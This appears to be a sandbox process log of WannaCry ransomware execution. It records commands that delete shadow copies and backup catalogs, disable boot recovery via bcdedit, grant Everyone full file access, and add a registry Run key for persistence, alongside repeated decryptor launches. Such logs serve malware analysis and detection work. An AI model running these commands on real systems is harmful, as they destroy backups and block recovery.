attrib.exe attrib +h .
2716icacls.exe icacls . /grant Everyone:F /T /C /Q
2760taskdl.exe taskdl.exe
2872cscript.exe cscript.exe //nologo m.vbs
2980taskhsvc.exe TaskData\Tor\taskhsvc.exe
2592cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
2728vssadmin.exe vssadmin delete shadows /all /quiet
2812WMIC.exe wmic shadowcopy delete
3012taskse.exe taskse.exe C:\Users\test22\AppData\Local\Temp\@WanaDecryptor@.exe
800@WanaDecryptor@.exe @WanaDecryptor@.exe
284cmd.exe cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "dhattnjpato996" /t REG_SZ /d "\"C:\Users\test22\AppData\Local\Temp\tasksche.exe\"" /f
1504reg.exe reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "dhattnjpato996" /t REG_SZ /d "\"C:\Users\test22\AppData\Local\Temp\tasksche.exe\"" /f
2300taskdl.exe taskdl.exe
884taskse.exe taskse.exe C:\Users\test22\AppData\Local\Temp\@WanaDecryptor@.exe
2780@WanaDecryptor@.exe @WanaDecryptor@.exe
2708taskdl.exe taskdl.exe
1080taskse.exe taskse.exe C:\Users\test22\AppData\Local\Temp\@WanaDecryptor@.exe
1736@WanaDecryptor@.exe @WanaDecryptor@.exe
1352taskdl.exe taskdl.exe
2748taskse.exe taskse.exe C:\Users\test22\AppData\Local\Temp\@WanaDecryptor@.exe
2124@WanaDecryptor@.exe @WanaDecryptor@.exe
676explorer.exe C:\Windows\Explorer.EXE
1452